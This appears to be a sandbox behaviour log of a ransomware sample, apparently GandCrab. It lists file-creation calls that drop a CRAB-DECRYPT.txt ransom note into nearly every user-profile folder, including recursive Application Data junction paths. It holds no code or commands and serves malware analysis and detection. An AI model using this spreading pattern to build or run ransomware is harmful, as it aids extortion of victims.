Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\My Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\My Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\My Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\NTUSER.DAT.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\NTUSER.DAT.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Start Menu\Programs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
